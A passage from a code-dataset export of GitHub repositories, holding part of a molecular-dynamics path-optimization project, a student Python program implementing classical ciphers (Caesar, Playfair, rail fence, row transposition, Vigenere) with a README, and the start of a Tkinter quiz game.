None:\n\t\t\traise ValueError(\"Atoms for defining PathCV not given\")\n\n\t\telse:\n\t\t\tif self.n_frames > 1:\n\t\t\t\tif doPBC:\n\t\t\t\t\tself.image_molecules(True)\n\t\t\t\tpluAtoms = self.atom_slice(pcvInd.atomSlice)\n\t\t\t\t# numpy array to store rowsum\n\t\t\t\trowSum = np.zeros((self.n_frames, 1))\n\t\t\t\tfor frame in range(0, self.n_frames):\n\t\t\t\t\t# align frames using alignIndex\n\t\t\t\t\tpluAtoms.superpose(pluAtoms,frame,pcvInd.align)\n\t\t\t\t\t# compute RMSD\n\t\t\t\t\tval = md.rmsd(pluAtoms, pluAtoms, frame, pcvInd.rms)\n\t\t\t\t\trowSum[frame] = np.sum(val)\n\t\t\t\t# store index of frame in geometric Center in self._gc\n\t\t\t\tself._gc = np.argmin(rowSum)\n\t\t\t\t# extract the central frame\n\t\t\t\tgcc = self.slice(self._gc)\n\t\t\telse:\n\t\t\t\tgcc = deepcopy(self._gc)\n\t\t\treturn gcc\n\n\t# ==================================================================================================================\n\t# Export the atoms defining PCV as a PDB file in plumed format\n\t# ==================================================================================================================\n\tdef save_plu2(self, filename, pcvInd=None, force_overwrite=True):\n\t\t\"\"\"Save trajectory to plumed PDB format\n\t\tParameters\n\t\t----------\n\t\tfilename : str\n\t\t\tfilesystem path in which to save the trajectory\n\t\tforce_overwrite : bool, default=True\n\t\t\tOverwrite anything that exists at filename, if its already there\n\t\tbfactors : array_like, default=None, shape=(n_frames, n_atoms) or (n_atoms,)\n\t\t\tSave bfactors with pdb file. If the array is two dimensional it should\n\t\t\tcontain a bfactor for each atom in each frame of the trajectory.\n\t\t\tOtherwise, the same bfactor will be saved in each frame.\n\t\t\"\"\"\n\t\tself._check_valid_unitcell()\n\n\t\tif pcvInd is None:\n\t\t\traise ValueError(\"Atoms for defining PCV not given\")\n\n\t\t#substract the plumed atoms from original trajectory\n\t\tpluAtoms=self.atom_slice(pcvInd.atomSlice)\n\n\t\tif len(pcvInd.atomInd) != pluAtoms.n_atoms:\n\t\t\traise ValueError(\"number of atom index %s should equal n_atoms %s\" % str(len(pcvInd.atomInd)), str(pluAtoms.n_atoms))\n\t\tif len(pcvInd.alignPLU) != pluAtoms.n_atoms:\n\t\t\traise ValueError(\"number of atoms to align %s should equal n_atoms %s\" % str(len(pcvInd.alignPLU)), str(pluAtoms.n_atoms))\n\t\tif len(pcvInd.rmsPLU) != pluAtoms.n_atoms:\n\t\t\traise ValueError(\"number of atoms for rmsd %s should equal n_atoms %s\" % str(len(pcvInd.rmsPLU)), str(pluAtoms.n_atoms))\n\n\t\twith plu.PluPDBfile(filename, 'w', force_overwrite=force_overwrite) as f:\n\t\t\tfor i in range(pluAtoms.n_frames_k):\n\t\t\t\tf.write(in_units_of(pluAtoms._xyz[i], Confs._distance_unit, f.distance_unit),\n\t\t\t\t\tpluAtoms.topology,\n\t\t\t\t\tframe_ind=(j+1),\n\t\t\t\t\tpcv_ind=pcvInd)\n"
},
{
"alpha_fraction": 0.4187391698360443,
"alphanum_fraction": 0.42452284693717957,
"avg_line_length": 37.125,
"blob_id": "12a0f0d33239cf1cce63a31a463222cf4aa1f821",
"content_id": "aae2428392e1d4a950b16d3ddb38d9e19f05885b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5187,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 136,
"path": "/runTAPS.py",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "from __future__ import print_function, division\n# =======================================================================================================================\n# import mpi4py for parallel computing\n# =======================================================================================================================\n#import mpi4py package #\n\n# ======================================================================================================================\n# digits formater for iterations: \"3 --> 03\"\n# ======================================================================================================================\ndef digits(s1):\n\ts2 = \"%.3d\" % s1\n\treturn s2\n\nfrom TAPS import *\n#from Confs import Confs\nimport time\nimport errno\nimport copy\nimport os\nfrom copy import deepcopy\n# =========================================================================================================\n# multiple independent taps\n# =========================================================================================================\nn_start = 0\nn_taps = 1\n\n# =========================================================================================================\n# number of iterations per taps\n# =========================================================================================================\nn_iter = 10\niter_start = 0\n\n# =========================================================================================================\n# input files\n# =========================================================================================================\ndirPars = 'pars' # dirPar\nparFile = 'taps.par' # parameters filename\ntopFile = 'protein.pdb' # topology filename\np0File = 'path' + str(iter_start) + '.xtc' # initial path file\nalignFile = 'align.ndx' # atom index file for alignment\nrmsFile = 'rms.ndx' # atom index file for rmsd computation\nndxFile = 'index.ndx'\n\nfor i in range(n_start,n_taps+n_start):\n\ttapsName = 'PathInd' + str(i)\n\t#print(\"+++DEBUG+++ Barrier before iteration\")\n\tcomm.Barrier()\n\n\tif rank == main_rank and not os.path.exists(tapsName):\n\t\ttry:\n\t\t\tos.makedirs(tapsName)\n\t\texcept OSError as error:\n\t\t\tif error.errno != errno.EEXIST:\n\t\t\t\traise #Here, just make directory for saving calculation data#\n\telse:\n\t time.sleep(5)\n\n\tif rank == main_rank:\n\n\t\tprint(tapsName, \":\")\n\t\tprint(\"+++TAPS+++ Reading input parameters\") \n\n\t\tt0 = time.time()\n\t\t#print(\"+++DEBUG+++ Size:\", size, \"Rank:\", rank, \"running TAPS\")\n\n\t\ttaps = TAPS(dirPars, parFile, topFile, p0File, alignFile, rmsFile, ndxFile)\t#Create file system and read parameters#\n\n\t\tte = time.time()\n\t\tprint(\"+++TAPS+++ Reading finished (time-cost:\", te - t0, 'sec)')\n\t\tpathList = []\n\n\t\trefPath = copy.copy(taps.refPath)\t#Initialize parameters and conformation for taps run#\n\t\tpathList.append(refPath)\n\t\tdirEvol = tapsName + '/paths'\n\t\tif not os.path.exists(dirEvol):\n\t\t\tos.makedirs(dirEvol)\n\t\trefPath.pathName = 'iter' + digits(iter_start)\n\t\trefPath.exportPath(dirEvol)\n\telse:\n\t\ttaps = None\n\t\trefPath = None\n\n\t#mpi4py barrier#\n\n\ttaps = comm.bcast(taps, root=main_rank)\n\trefPath = comm.bcast(refPath, root=main_rank)\n\n\t#mpi4py barrier#\n\n\tfor j in range(iter_start, iter_start + n_iter):\n\t\t# ==================================================================================================\n\t\t# iteration index\n\t\t# ==================================================================================================\n\t\titr = 'iter' + digits(j+1)\n\t\t# ==================================================================================================\n\t\t# one taps iteration\n\t\t# ==================================================================================================\n\t\tdirMeta = tapsName + '/sampling/' + itr\t\t\n\n\t\tif rank == 0:\n\t\t\tprint(\"+++TAPS+++ \", itr, \": Preparing perpendicular sampling\")\n\t\t\tdirRUNs = taps.meta_dirs(refPath, dirMeta)\t#Create working directories#\n\t\t\tti = time.time()\n\t\t\ttaps.meta_setup(refPath, dirMeta, dirRUNs) \n\t\t\tte = time.time()\n\t\t\tprint(\"+++TAPS+++ \", itr, \": Sampling preparation finished (time-cost: \", te - ti, 'sec)')\n\t\t\tprint(\"+++TAPS+++ \", itr, \": Start perpendicular sampling\")\n\t\telse:\n\t\t\tdirRUNs = None\n\n\t\t#mpi4py barrier#\n\t\tdirRUNs = comm.bcast(dirRUNs, root=main_rank)\n\t\t#mpi4py barrier#\n\t\ttaps.meta_sample(dirMeta, dirRUNs)\n\t\t#mpi4py barrier#\n\t\t\n\t\tif rank == main_rank:\n\t\t\ttf = time.time()\n\t\t\tprint(\"+++TAPS+++ \", itr, \": Perpendicular sampling finished (time-cost: \", tf - te, 'sec)')\n\t\t\tprint(\"+++TAPS+++ \", itr, \": Analyzing data to update path\")\n\t\t\t\n\t\tp_meta = taps.meta_analyze(dirMeta, dirRUNs)\n\n\t\tif rank == main_rank:\n\t\t\ttg = time.time()\n\t\t\tprint(\"+++TAPS+++ \", itr, \": Analysis finished (time-cost: \", tg - tf, 'sec)')\n\t\t\tp_meta.pathName = itr\n\t\t\tp_meta.exportPath(dirEvol)\n\t\t\tprint(' ')\n\t\t\trefPath = deepcopy(p_meta)\n\n\tif rank== 0:\n\t\tprint('Path Optimization finished.')\n\t#mpi4py barrier#\n\n#mpi4py finalize# \n"
}
] | 7 |
PaulgSmith/Crypto
|
https://github.com/PaulgSmith/Crypto
|
767f7880d53b727b5dfe8dd023f6a4c828522a69
|
6bbbf72816bcd98d11adf9149870f55883586842
|
642a886b60c5792920c76e20b4cbf228937d73ed
|
refs/heads/master
| 2019-03-20T16:30:39.050577 | 2018-04-11T19:01:56 | 2018-04-11T19:01:56 | 123,982,057 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5795741677284241,
"alphanum_fraction": 0.5821003317832947,
"avg_line_length": 40.43939208984375,
"blob_id": "a3d153a4c0f6058e38ff50a4a639234daa70bb1f",
"content_id": "db263dd111f939e5d70cf100ccf5ae8c775a301b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2771,
"license_type": "no_license",
"max_line_length": 144,
"num_lines": 66,
"path": "/cipher.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nimport argparse\nfrom ceasar import ceasar\nfrom rowtrans import rt\nfrom playfair import plf\nfrom rail import rl\nfrom vigenere import vig\nimport os\n\n\nparser = argparse.ArgumentParser(description=\"Cipher is a program that reads the input file, encrypts the file contents using the specified key\"\n \" and cipher, and writes the encypted/decrypted contents to the specific file\")\n\n\nparser.add_argument(\"cipher_name\", choices=['plf','rts','rfc', 'vig', 'ces','PLF','RTS','RFC', 'VIG', 'CES'],\n help='List of valid cipher options')\n \nparser.add_argument(\"key\", help=\"The encryption key to use\")\nparser.add_argument(\"enc_dec\", choices=['enc','dec','DEC','ENC'],\n help=\"Whether to encrypt or decrypt, respectively\")\n \nparser.add_argument(\"inputfile\", help=\"The file from which to read the input\")\nparser.add_argument(\"outputfile\", help=\"The file to which the output shall be written\")\nargs = parser.parse_args()\n\nfilepath = args.inputfile\noutput = args.outputfile\nif not os.path.isfile(filepath):\n print(\"File path {} does not exist. Exiting...\".format(filepath))\nif True:\n if True:\n with open(filepath, 'r') as file:\n input_text = file.read().replace('\\n', '').replace(' ', '')\n input_text = input_text.lower()\n file.close()\n\n if args.cipher_name == 'ces' or args.cipher_name == 'CES':\n cipher = ceasar(args.key, input_text)\n elif args.cipher_name == 'rts' or args.cipher_name == 'RTS':\n cipher = rt(args.key, input_text)\n elif args.cipher_name == 'plf' or args.cipher_name == 'PLF':\n cipher = plf(args.key, input_text)\n elif args.cipher_name == 'rfc' or args.cipher_name == 'RFC':\n cipher = rl(args.key, input_text)\n elif args.cipher_name == 'vig' or args.cipher_name == 'VIG':\n cipher = vig(args.key, input_text)\n \n if cipher.bool_set_key():\n file = open(output, 'w')\n if args.enc_dec == 'enc' or args.enc_dec == 'ENC':\n file.write(cipher.encrypt())\n elif args.enc_dec == 'dec' or args.enc_dec == 'DEC':\n file.write(cipher.decrypt())\n else:\n print(\"The ENC/DEC {} is in the wrong format. Please check and try again.\".format(args.key))\n else:\n print(\"The key {} is in the wrong format. Please check and try again.\".format(args.key))\n \n\nelse:\n print(\"File path {} does not exist. Exiting...\".format(output))\n \n\n \n \n \n \n \n \n"
},
{
"alpha_fraction": 0.5994436740875244,
"alphanum_fraction": 0.6091794371604919,
"avg_line_length": 31.68181800842285,
"blob_id": "67825708035d6ab2f48877019d2c17a01f6bf245",
"content_id": "20e26ca00325b14a9a4bd4ffc1b8d0a02bc18ff8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 719,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 22,
"path": "/cipher_interface.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nclass cipher_interface(object):\n \"\"\"<CIPHER NAME> <KEY> <ENC/DEC> <INPUTFILE> <OUTPUT FILE>\"\"\"\n def __init__(self, key, text):\n self.key = key\n self.text = text\n \n \"\"\"\"Sets the key to use for encryption/decryption.\"\"\"\n def bool_set_Key(self, key):\n return False\n \"\"\"encrypts a string of plaintext and returns the cipher text string.\"\"\"\n def string_encrypt(self, plaintext): \n return \"\"\n \n \"\"\"decrypts a string of ciphertext and returns the decrypted plaintext.\"\"\"\n def string_decrypt(self, ciphertext):\n return \"\"\n"
},
{
"alpha_fraction": 0.4811059832572937,
"alphanum_fraction": 0.4921658933162689,
"avg_line_length": 32.98387145996094,
"blob_id": "17277ae70734d58a9f187c281e23789cddf82da5",
"content_id": "1ad29c355d179489772fd96d8dfcc5706be8abd8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2170,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 62,
"path": "/rowtrans.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\"Row Transposition Cipher.\"\"\"\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nfrom cipher_interface import cipher_interface\nimport math\n\nclass rt(cipher_interface):\n \n def bool_set_key(self):\n key = list(self.key)\n if self.key.isdigit():\n num = 1\n int_key = list(map(int, key))\n for x in range(0, len(self.key)):\n if num in int_key:\n num = num + 1\n else:\n return False\n return True\n else:\n return False\n\n def encrypt(self):\n plaintext = list(self.text)\n key = list(self.key)\n results = list()\n rows = math.ceil(len(plaintext) / len(key))\n extra_letters = (rows * len(key)) - len(plaintext)\n results = list()\n for x in range(0, int(extra_letters)):\n plaintext.append(chr(122 - (extra_letters-1 - x)))\n for x in range(0, len(key)):\n column = int(key[x]) -1\n tmp_list = list()\n for y in range (0, int(rows)):\n next_letter = plaintext[column + (len(key) * y)]\n tmp_list.append(next_letter)\n results.extend(tmp_list)\n results_format = ''.join(results)\n return results_format\n \n def decrypt(self):\n ciphertext = list(self.text)\n key = list(self.key)\n rows = math.ceil(len(ciphertext) / len(key))\n ordered_cipher = [0] * len(ciphertext)\n int_key = list(map(int, key))\n for x in range (0, len(key)):\n tmp = int_key.index(x+1)\n tmp = tmp \n for y in range (0, int(rows)):\n ordered_cipher[(int(rows) * x) + y] = ciphertext[tmp * int(rows) + y]\n plaintext = ['a'] * len(ordered_cipher)\n for x in range (0, int(rows)):\n for y in range (0, len(key)):\n plaintext[(len(key) * x) + y] = ordered_cipher[x + y * int(rows) ]\n results = ''.join(plaintext)\n return results\n \n \n \n \n \n \n \n"
},
{
"alpha_fraction": 0.37491878867149353,
"alphanum_fraction": 0.4035087823867798,
"avg_line_length": 26,
"blob_id": "12c72a92462999ccd3380b4fed9e1fab556b1ab3",
"content_id": "1e16204176a954c8c44915de532c585b50948bb4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1539,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 57,
"path": "/ceasar.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\"Ceasar cypher.\"\"\"\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nfrom cipher_interface import cipher_interface\n\nclass ceasar(cipher_interface):\n \n def bool_set_key(self):\n if self.key.isdigit() and int(self.key) > 0:\n return True\n else:\n return False\n\n def encrypt(self):\n tmp = list(self.text)\n i = 0\n for x in tmp:\n if ord(tmp[i]) != 32:\n ascii = (ord(tmp[i]) + int(self.key)) % 123\n if ascii < 97:\n ascii += 97\n tmp[i] = chr(ascii)\n i += 1\n results = ''.join(tmp)\n return results\n \n def decrypt(self):\n tmp = list(self.text)\n i = 0\n for x in tmp:\n if ord(tmp[i]) != 32:\n ascii = (ord(tmp[i]) - int(self.key)) % 123\n if ascii < 97:\n ascii += 26\n tmp[i] = chr(ascii)\n i += 1\n results = ''.join(tmp)\n return results\n \n \"\"\"def brute():\n k = 1\n for k in range(26):\n tmp = list()\n i = 0\n for x in tmp:\n if ord(tmp[i]) != 32:\n ascii = (ord(tmp[i]) - k) % 123\n if ascii < 97:\n ascii += 26\n tmp[i] = chr(ascii)\n i += 1\n results = ''.join(tmp)\n print(results)\"\"\"\n"
},
{
"alpha_fraction": 0.4350844919681549,
"alphanum_fraction": 0.4494956135749817,
"avg_line_length": 40.89011001586914,
"blob_id": "635bc11a6a807584dd37149514711df6782dc72a",
"content_id": "ed23e578848aac48e490dcc204a1bdfd3eb51f79",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7633,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 182,
"path": "/playfair.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\"Playfair Cipher.\"\"\"\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nfrom cipher_interface import cipher_interface\n\nclass plf(cipher_interface):\n \n def bool_set_key(self):\n if self.key.isalpha():\n return True\n else:\n return False\n \n def encrypt(self):\n fivexfive_key = [0] * 25\n key = list(self.key)\n tmp = 0\n plaintext = list(self.text)\n i_or_j = False\n for x in range (0, len(key)):\n if key[x] not in fivexfive_key:\n if key[x] != 'i' and key[x] != 'j':\n fivexfive_key[tmp] = key[x]\n tmp = tmp + 1\n elif not i_or_j:\n if key[x] == 'i' and 'j' not in fivexfive_key:\n fivexfive_key[tmp] = key[x]\n tmp = tmp + 1\n i_or_j = True\n elif key[x] == 'j' and 'i' not in fivexfive_key:\n fivexfive_key[tmp] = key[x]\n tmp = tmp + 1\n i_or_j = True\n ascii = 97\n for x in range (0, 26):\n if chr(ascii) not in fivexfive_key:\n if chr(ascii) != 'i' and chr(ascii) != 'j':\n fivexfive_key[tmp] = chr(ascii)\n tmp = tmp + 1\n else:\n if not i_or_j:\n fivexfive_key[tmp] = chr(ascii)\n tmp = tmp + 1\n i_or_j = True\n ascii = ascii + 1\n \n for x in range(0, len(plaintext) -1, 2):\n if (plaintext[x] == plaintext[x+1]):\n plaintext.insert(x+1, 'x')\n if len(plaintext) % 2 != 0:\n plaintext.append('x')\n \n ciphertext = list()\n ciphertext = [0] * len(plaintext)\n for x in range(0, len(plaintext), 2):\n first = plaintext[x]\n second = plaintext[x+1]\n first_location = int(fivexfive_key.index(first))\n second_location = int(fivexfive_key.index(second))\n first_row = int(first_location / 5)\n second_row = int(second_location / 5)\n first_colmn = fivexfive_key.index(first) % 5\n second_colmn = fivexfive_key.index(second) % 5\n if first_row == second_row:\n first_colmn = first_colmn + 1\n second_colmn = second_colmn + 1\n \n if (first_colmn != 5):\n ciphertext[x] = fivexfive_key[first_location + 1]\n else:\n ciphertext[x] = fivexfive_key[first_location - 4]\n \n if (second_colmn != 5):\n ciphertext[x+1] = fivexfive_key[second_location + 1]\n else:\n ciphertext[x+1] = fivexfive_key[second_location - 4]\n elif first_colmn == second_colmn:\n first_row = first_row + 1\n second_row = second_row + 1\n \n if (first_row != 5):\n ciphertext[x] = fivexfive_key[first_location + 5]\n else:\n ciphertext[x] = fivexfive_key[first_location - 20]\n \n if (second_row != 5):\n ciphertext[x+1] = fivexfive_key[second_location + 5]\n else:\n ciphertext[x+1] = fivexfive_key[second_location - 20]\n \n elif first_colmn > second_colmn:\n ciphertext[x] = fivexfive_key[first_location - (first_colmn - second_colmn)]\n ciphertext[x + 1] = fivexfive_key[second_location + (first_colmn - second_colmn)]\n elif first_colmn < second_colmn:\n ciphertext[x] = fivexfive_key[first_location + (second_colmn - first_colmn)]\n ciphertext[x + 1] = fivexfive_key[second_location - (second_colmn - first_colmn)]\n results = ''.join(ciphertext)\n return results\n \n def decrypt(self): \n fivexfive_key = [0] * 25\n key = list(self.key)\n tmp = 0\n ciphertext = list(self.text)\n i_or_j = False\n for x in range (0, len(key)):\n if key[x] not in fivexfive_key:\n if key[x] != 'i' and key[x] != 'j':\n fivexfive_key[tmp] = key[x]\n tmp = tmp + 1\n elif not i_or_j:\n if key[x] == 'i' and 'j' not in fivexfive_key:\n fivexfive_key[tmp] = key[x]\n tmp = tmp + 1\n i_or_j = True\n elif key[x] == 'j' and 'i' not in fivexfive_key:\n fivexfive_key[tmp] = key[x]\n tmp = tmp + 1\n i_or_j = True\n ascii = 97\n for x in range (0, 26):\n if chr(ascii) not in fivexfive_key:\n if chr(ascii) != 'i' and chr(ascii) != 'j':\n fivexfive_key[tmp] = chr(ascii)\n tmp = tmp + 1\n else:\n if not i_or_j:\n fivexfive_key[tmp] = chr(ascii)\n tmp = tmp + 1\n i_or_j = True\n ascii = ascii + 1\n \n plaintext = list()\n plaintext = [0] * len(ciphertext)\n for x in range(0, len(ciphertext), 2):\n first = ciphertext[x]\n second = ciphertext[x+1]\n first_location = int(fivexfive_key.index(first))\n second_location = int(fivexfive_key.index(second))\n first_row = int(first_location / 5)\n second_row = int(second_location / 5)\n first_colmn = fivexfive_key.index(first) % 5\n second_colmn = fivexfive_key.index(second) % 5\n if first_row == second_row:\n first_colmn = first_colmn - 1\n second_colmn = second_colmn - 1\n \n if (first_colmn >= 0):\n plaintext[x] = fivexfive_key[first_location - 1]\n else:\n plaintext[x] = fivexfive_key[first_location + 4]\n \n if (second_colmn >= 0):\n plaintext[x+1] = fivexfive_key[second_location - 1]\n else:\n plaintext[x+1] = fivexfive_key[second_location + 4]\n elif first_colmn == second_colmn:\n first_row = first_row - 1\n second_row = second_row - 1\n \n if (first_row >= 0):\n plaintext[x] = fivexfive_key[first_location - 5]\n else:\n plaintext[x] = fivexfive_key[first_location + 20]\n \n if (second_row >= 0):\n plaintext[x+1] = fivexfive_key[second_location - 5]\n else:\n plaintext[x+1] = fivexfive_key[second_location + 20]\n \n elif first_colmn > second_colmn:\n plaintext[x] = fivexfive_key[first_location - (first_colmn - second_colmn)]\n plaintext[x + 1] = fivexfive_key[second_location + (first_colmn - second_colmn)]\n elif first_colmn < second_colmn:\n plaintext[x] = fivexfive_key[first_location + (second_colmn - first_colmn)]\n plaintext[x + 1] = fivexfive_key[second_location - (second_colmn - first_colmn)]\n results = ''.join(plaintext)\n return results\n \n"
},
{
"alpha_fraction": 0.43294116854667664,
"alphanum_fraction": 0.45588234066963196,
"avg_line_length": 26.852458953857422,
"blob_id": "a25ce030557ea7b6f31c782d582837b734ebb568",
"content_id": "c8e1a009cdc4a7275803b817f119dd42991d293d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1700,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 61,
"path": "/vigenere.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\"VigenereCipher.\"\"\"\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nfrom cipher_interface import cipher_interface\n\nclass vig(cipher_interface):\n \n def bool_set_key(self):\n if self.key.isalpha():\n return True\n else:\n return False\n \n def encrypt(self):\n plaintext = list(self.text)\n ciphertext = [0] * len(plaintext)\n key_num = [0] * len(self.key)\n key = self.key\n i = 0\n for x in key:\n key_num[i] = int(ord(x) - 97)\n i += 1\n i = 0\n text_loop = 0\n for x in plaintext:\n if text_loop == len(key):\n text_loop = 0\n ascii = (ord(x) + key_num[text_loop]) % 123\n text_loop += 1\n if ascii < 97:\n ascii += 97\n ciphertext[i] = chr(ascii)\n i += 1\n results = ''.join(ciphertext)\n return results\n \n def decrypt(self): \n ciphertext = list(self.text)\n\n plaintext = [0] * len(ciphertext)\n key = self.key\n i = 0\n text_loop = 0\n for x in ciphertext:\n if text_loop == len(key):\n text_loop = 0\n if ord(key[text_loop]) > abs(ord(x)):\n ascii = (abs((ord(key[text_loop])) - 123) + (ord(x)))\n plaintext[i] = chr(ascii)\n else:\n ascii = (abs(ord(x) - ord(key[text_loop]))) % 123\n plaintext[i] = chr(ascii + 97)\n text_loop += 1\n\n i += 1\n results = ''.join(plaintext)\n return results \n"
},
{
"alpha_fraction": 0.43775302171707153,
"alphanum_fraction": 0.4524291455745697,
"avg_line_length": 28.492536544799805,
"blob_id": "d8d1702d01df174a08e5e61aa3d2bb280f85c76a",
"content_id": "0a6412e73d79f982bac24c2df2159fa3d8f74249",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1976,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 67,
"path": "/rail.py",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\"Rail Fence Cipher.\"\"\"\n__author__ = \"Paul Smith\"\n__copyright__ = \"Copyright (C) 2018 Paul Smith\"\n__license__ = \"Public Domain\"\n__version__ = \"1.0\"\n\nfrom cipher_interface import cipher_interface\n\nclass rl(cipher_interface):\n \n def bool_set_key(self):\n if self.key.isdigit() and int(self.key) > 0:\n return True\n else:\n return False\n\n def encrypt(self):\n plaintext = list(self.text)\n ciphertext = [0] * len(plaintext)\n key = int(self.key)\n tmp = 0\n if int(len(plaintext)) <= int(key):\n letter_per_row = 1\n xtra_letters = 0\n else:\n letter_per_row = int(len(plaintext)/key)\n xtra_letters = int(len(plaintext) % key)\n for x in range (0, key):\n y = 0\n if xtra_letters > 0:\n additional = 1\n else:\n additional = 0\n while y < letter_per_row + additional:\n ciphertext[tmp] = plaintext[x + key*y]\n tmp += 1\n y += 1\n if tmp == int(len(plaintext)):\n break\n xtra_letters -= 1 \n results = ''.join(ciphertext)\n return results\n \n def decrypt(self):\n ciphertext = list(self.text)\n plaintext = [0] * len(ciphertext)\n key = int(self.key)\n x = 0\n index = 0\n range = int(len(plaintext)/key)\n while x <= range:\n y = 0\n if index == len(ciphertext):\n break \n while y < key:\n if index == len(ciphertext):\n break\n if y == 0:\n plaintext[index]= ciphertext[x + range*y]\n else:\n plaintext[index]= ciphertext[x + range*y + 1]\n index += 1\n y += 1\n x += 1\n results = ''.join(plaintext)\n return results\n"
},
{
"alpha_fraction": 0.7513172030448914,
"alphanum_fraction": 0.7534246444702148,
"avg_line_length": 34.074073791503906,
"blob_id": "841f1b3e1809bbb523743d60fad32fafec51367e",
"content_id": "d1408829bb4654ed8f7be3f35e93a95cb12c47b6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 949,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 27,
"path": "/Readme.txt",
"repo_name": "PaulgSmith/Crypto",
"src_encoding": "UTF-8",
"text": "Paul Smith\[email protected]\nPython\nNo Extra Credit\n\n# Cipher\n\nCipher is a program that reads the input file, encrypts/decrypts the file contents using the specified key\nand cipher, and writes the encypted/decrypted contents to the specific file.\n\n## Use Instructions: Command Line Instructions\n\npython3 cipher.py [-h] {plf,rts,rfc,vig,ces} key {enc,dec} inputfile outputfile\n\n -h: help options\n\n {plf,rts,rfc,vig,ces}: First input is 3 letters for choosing which cipher you would like to choose\n\n key: The second imput is for the key that you would like to use with the chosen cipher\n\n {enc,dec}: The third input is for choosing whether you would like to encrypt or decrypt\n\n inputfile: The fourth input is for the name of the file with your message\n\n outputfile: The fith input is for the name of the destination file where your ciphertext will be saved\n\n Note: Input and output files should be in the same location as the python files\n\n"
}
] | 8 |
VedantMahajan99/personal-projects-2018-19
|
https://github.com/VedantMahajan99/personal-projects-2018-19
|
c602f31b736afb15f4239e3492b7fc3583f539d0
|
f42963090c25c166174548c5e96993cb35019705
|
b2ea3f9e7e526f7470370386fd438dd412c31444
|
refs/heads/master
| 2022-06-29T17:44:56.332820 | 2020-05-12T06:55:14 | 2020-05-12T06:55:14 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5551744103431702,
"alphanum_fraction": 0.5906231999397278,
"avg_line_length": 35.4375,
"blob_id": "d9a97e1e747d0cf96769d784f6826ae6872cf0da",
"content_id": "a0a196f1f21119f7224b24dbf84edd21f22317d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1749,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 48,
"path": "/who_wants_to_be_the_millionare/kbc2.py",
"repo_name": "VedantMahajan99/personal-projects-2018-19",
"src_encoding": "UTF-8",
"text": "from finalform import *\nfrom tkinter import *\nfrom tkinter.messagebox import *\nfrom ttkthemes import themed_tk as tk\nfrom tkinter import ttk\nclass kbc2:\n def play_game(self):\n # self.root.destroy()\n self.fw_kbc = kbc3(self.root)\n def exit(self):\n msgbox = askquestion('Exit application', 'Are you sure you want to exit')\n if msgbox=='yes':\n self.root.destroy()\n\n def __init__(self):\n # root = Tk()\n self.root=tk.ThemedTk()\n self.root.get_themes()\n # self.root.set_theme('clam')\n self.root.set_theme('radiance')\n self.root.geometry(\"{0}x{0}+0+0\".format(self.root.winfo_screenwidth(), self.root.winfo_screenheight()))\n # self.root.attributes('-fullscreen', True)\n self.root.config(background=\"#090035\")\n self.pannel1 = PanedWindow(self.root, bg='#090035')\n self.pannel2 = PanedWindow(self.root, bg='#090035')\n self.pannel1.pack()\n self.pannel2.pack()\n dp_logo = PhotoImage(file=\"img/que.png\")\n Label(self.pannel1, image=dp_logo, bg='#090035').grid(row= 0, column=0)\n\n dp_rules = PhotoImage(file=\"img/rules.png\")\n Label(self.pannel1, image=dp_rules, bg='#090035').grid(row=0, column= 1, padx =50)\n\n pic_play = 